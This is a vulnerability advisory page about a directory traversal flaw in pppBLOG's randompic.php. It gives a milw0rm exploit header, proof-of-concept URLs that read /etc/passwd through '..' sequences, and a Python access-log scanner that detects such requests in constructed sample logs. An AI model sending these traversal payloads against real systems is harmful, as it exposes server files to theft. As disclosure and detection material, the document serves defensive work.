Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file.
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
# This was written for educational purposes. Use it at your own risk.
# Author will not be responsible for any damage.
# In memory of rgod ;)
*Requirements: register_globals = On
vulnerable code in randompic.php at lines 66-72:
poc = randompic.php?files=[file]
poc = randompic.php?files=../../../../../../../../../../etc/passwd
linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).
tested on localhost with register_globals = On.
# milw0rm.com [2008-11-03]
rgod is credited with the discovery of this vulnerability.
pppBLOG pppBLOG 0.3.11
pppBLOG pppBLOG 0.3.8
pppBlog is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.
This vulnerability may be exploited via a browser.
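One way to look for this issue in web-server access logs, as an added example that is not part of the original advisory or of the pppBLOG code: the script flags requests to randompic.php whose `file` or `files` parameter (scalar or array index, covering both spellings used above) contains a `..` path segment after URL decoding. The log lines, IP addresses and the `/blog/` path are constructed sample data, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Nov/2008:10:00:01 +0000] "GET /blog/randompic.php HTTP/1.1" 200 512
192.0.2.11 - - [03/Nov/2008:10:00:02 +0000] "GET /blog/randompic.php?files=../../../../etc/passwd HTTP/1.1" 200 1400
192.0.2.12 - - [03/Nov/2008:10:00:03 +0000] "GET /blog/randompic.php?file[0]=..%2f..%2fconfig.php HTTP/1.1" 200 300
192.0.2.14 - - [03/Nov/2008:10:00:05 +0000] "GET /blog/index.php?files=../x HTTP/1.1" 404 0
192.0.2.15 - - [03/Nov/2008:10:00:06 +0000] "GET /blog/randompic.php?files=holiday..2008.jpg HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PARAM_RE = re.compile(r'^files?(\[[^\]]*\])?$')    # file, files, file[0], files[x]
DOTDOT_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # ".." as a whole path segment

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so layered encodings are still matched."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_request(target):
    """True if the request target hits randompic.php with a dot-dot file parameter."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/randompic.php"):
        return False
    # parse_qsl already decodes once; fully_decode handles any extra layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if PARAM_RE.match(fully_decode(name)) and DOTDOT_RE.search(fully_decode(value)):
            return True
    return False

def scan(log_text):
    """Return the client address of every log line that matches."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal_request(m.group(1)):
            hits.append(line.split()[0])
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 response with an unusual body size on a matching line is worth a closer look, since the script normally returns image data.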
The following exploit and example URIs are available: